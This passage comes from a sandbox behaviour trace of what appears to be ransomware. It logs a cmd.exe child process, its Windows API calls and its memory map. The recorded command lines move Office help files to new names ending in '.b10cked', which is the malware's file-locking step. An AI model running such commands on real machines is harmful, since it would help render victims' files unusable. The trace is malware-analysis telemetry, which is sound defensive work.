_String2="PROCESS", _MaxCount=0x7) returned -13 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 
[0204.399] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0204.399] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0204.399] _wcsicmp (_String1="MSWINP~2.HXN", _String2=".") returned 63 [0204.399] _wcsicmp (_String1="MSWINP~2.HXN", _String2="..") returned 63 [0204.399] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mswinp~2.hxn")) returned 0x2022 [0204.400] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x241e58 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.400] SetErrorMode (uMode=0x0) returned 0x0 [0204.400] SetErrorMode (uMode=0x1) returned 0x0 [0204.400] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN", nBufferLength=0x104, lpBuffer=0x18eea4, lpFilePart=0x18ee8c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN", lpFilePart=0x18ee8c*="MSWINP~2.HXN") returned 0x27 [0204.400] SetErrorMode (uMode=0x0) returned 0x1 [0204.400] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0204.400] _wcsicmp (_String1="MSWINP~2.HXN", _String2=".") returned 63 [0204.400] _wcsicmp (_String1="MSWINP~2.HXN", _String2="..") returned 63 [0204.400] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mswinp~2.hxn")) returned 0x2022 [0204.922] SetErrorMode (uMode=0x0) returned 0x0 [0204.922] SetErrorMode (uMode=0x1) returned 0x0 [0204.922] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN", nBufferLength=0x104, lpBuffer=0x18f320, lpFilePart=0x18f0b8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN", lpFilePart=0x18f0b8*="MSWINP~2.HXN") returned 0x27 [0204.922] SetErrorMode (uMode=0x0) returned 0x1 [0204.922] SetErrorMode (uMode=0x0) returned 0x0 [0204.922] SetErrorMode (uMode=0x1) returned 0x0 [0204.923] 
GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.DEV.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x18f528, lpFilePart=0x18f0b8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.DEV.14.1033.hxn.b10cked", lpFilePart=0x18f0b8*="MS.WINPROJ.DEV.14.1033.hxn.b10cked") returned 0x3d [0204.923] SetErrorMode (uMode=0x0) returned 0x1 [0204.923] SetLastError (dwErrCode=0x0) [0204.923] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.DEV.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.winproj.dev.14.1033.hxn.b10cked")) returned 0xffffffff [0204.923] GetLastError () returned 0x2 [0204.923] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x18ea34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea34) returned 0x230e90 [0204.923] FindNextFileW (in: hFindFile=0x230e90, lpFindFileData=0x18ea34 | out: lpFindFileData=0x18ea34) returned 0 [0204.924] FindClose (in: hFindFile=0x230e90 | out: hFindFile=0x230e90) returned 1 [0204.924] GetLastError () returned 0x12 [0204.924] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x18ea34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea34) returned 0x230e90 [0204.924] FindNextFileW (in: hFindFile=0x230e90, lpFindFileData=0x18ea34 | out: lpFindFileData=0x18ea34) returned 0 [0204.924] FindClose (in: hFindFile=0x230e90 | out: hFindFile=0x230e90) returned 1 [0204.924] GetLastError () returned 0x12 [0204.925] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x241bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x241bf8) returned 0x230e90 [0204.925] FindNextFileW (in: hFindFile=0x230e90, lpFindFileData=0x241bf8 | out: lpFindFileData=0x241bf8) returned 0 [0204.925] 
FindClose (in: hFindFile=0x230e90 | out: hFindFile=0x230e90) returned 1 [0204.926] GetLastError () returned 0x12 [0204.926] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x241bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x241bf8) returned 0x230e90 [0204.926] FindNextFileW (in: hFindFile=0x230e90, lpFindFileData=0x241bf8 | out: lpFindFileData=0x241bf8) returned 0 [0204.926] FindClose (in: hFindFile=0x230e90 | out: hFindFile=0x230e90) returned 1 [0204.926] GetLastError () returned 0x12 [0204.926] _get_osfhandle (_FileHandle=2) returned 0xb [0204.926] GetFileType (hFile=0xb) returned 0x2 [0204.926] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0204.926] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18ec04 | out: lpMode=0x18ec04) returned 1 [0204.926] _get_osfhandle (_FileHandle=2) returned 0xb [0204.927] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18ec38 | out: lpConsoleScreenBufferInfo=0x18ec38) returned 1 [0204.927] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0204.928] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18ec78 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0204.928] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x18ec5c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18ec5c*=0x2c) returned 1 [0204.930] longjmp () [0204.930] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.930] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.930] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.930] GetConsoleMode (in: 
hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.930] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.938] SetConsoleInputExeNameW () returned 0x1 [0204.942] GetConsoleOutputCP () returned 0x1b5 [0204.946] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.946] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.946] exit (_Code=1) Process: id = "484" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169c0" os_pid = "0x89c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29451 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29452 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29453 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29454 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" 
filename = "" Region: id = 29455 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29456 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29457 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29458 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29459 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 29460 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29902 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29903 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29904 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 29905 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29906 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 
29907 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29908 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29909 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29910 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29911 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29912 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29913 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29914 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29915 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29916 start_va 
= 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 29917 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29918 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29919 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 29920 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 29921 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 29922 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 29923 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 29924 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 29925 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 29982 start_va = 0x1270000 end_va = 0x132ffff entry_point = 0x1270000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 681 os_tid = 0xde0 [0202.442] GetSystemTimeAsFileTime (in: 
lpSystemTimeAsFileTime=0x28f7e4 | out: lpSystemTimeAsFileTime=0x28f7e4*(dwLowDateTime=0xad79b400, dwHighDateTime=0x1d440a9)) [0202.442] GetCurrentProcessId () returned 0x89c [0202.443] GetCurrentThreadId () returned 0xde0 [0202.443] GetTickCount () returned 0x39221 [0202.443] QueryPerformanceCounter (in: lpPerformanceCount=0x28f7dc | out: lpPerformanceCount=0x28f7dc*=25923177635) returned 1 [0202.443] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.443] __set_app_type (_Type=0x1) [0202.443] __p__fmode () returned 0x76b331f4 [0202.443] __p__commode () returned 0x76b331fc [0202.443] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.443] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.443] GetCurrentThreadId () returned 0xde0 [0202.443] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xde0) returned 0x38 [0202.444] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.444] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.444] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.444] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.444] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f774 | out: phkResult=0x28f774*=0x0) returned 0x2 [0202.444] VirtualQuery (in: lpAddress=0x28f7ab, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.444] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x190000, 
AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.444] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.444] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.444] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.444] GetConsoleOutputCP () returned 0x1b5 [0202.444] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.444] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.444] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.444] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.445] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.445] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.445] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.445] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.445] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.445] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.445] GetEnvironmentStringsW () returned 0x80180* [0202.445] FreeEnvironmentStringsW (penv=0x80180) returned 1 [0202.445] GetEnvironmentStringsW () returned 0x80180* [0202.445] 
FreeEnvironmentStringsW (penv=0x80180) returned 1 [0202.445] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e6e4 | out: phkResult=0x28e6e4*=0x40) returned 0x0 [0202.445] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0xa8, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x1, lpcbData=0x28e6e8*=0x4) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x1, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x0, lpcbData=0x28e6e8*=0x4) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x40, lpcbData=0x28e6e8*=0x4) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x40, lpcbData=0x28e6e8*=0x4) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x40, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0202.446] RegCloseKey (hKey=0x40) returned 0x0 [0202.446] 
RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e6e4 | out: phkResult=0x28e6e4*=0x40) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x40, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x1, lpcbData=0x28e6e8*=0x4) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x1, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x0, lpcbData=0x28e6e8*=0x4) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x9, lpcbData=0x28e6e8*=0x4) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x9, lpcbData=0x28e6e8*=0x4) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x9, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0202.446] RegCloseKey (hKey=0x40) returned 0x0 [0202.446] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.446] srand 
(_Seed=0x5b8863a4) [0202.446] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.14.1033.hxn.b10cked\"" [0202.446] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.14.1033.hxn.b10cked\"" [0202.446] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.447] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x818e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.447] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.447] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.447] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.447] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.447] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.447] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.447] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.447] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.447] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.447] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.447] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.447] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.447] GetEnvironmentStringsW () 
returned 0x822d0* [0202.447] FreeEnvironmentStringsW (penv=0x822d0) returned 1 [0202.447] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.447] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.447] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.447] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.447] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.447] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.447] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.447] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.447] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.447] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.447] GetCurrentDirectoryW (in: 